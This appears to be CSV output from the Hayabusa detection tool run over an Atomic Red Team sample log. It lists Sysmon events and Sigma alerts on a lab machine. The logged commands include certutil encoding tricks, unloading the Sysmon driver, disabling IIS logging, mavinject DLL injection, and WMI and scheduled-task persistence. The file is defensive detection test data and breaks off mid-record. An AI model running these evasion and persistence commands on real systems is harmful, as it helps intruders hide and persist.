2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.496 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: 
C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,../hayabusa-rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR 
C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR 
C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 
747F3D96-DA6A-5D31-0000-00104BC83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 
747F3D96-DA6E-5D31-0000-001081F93E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: 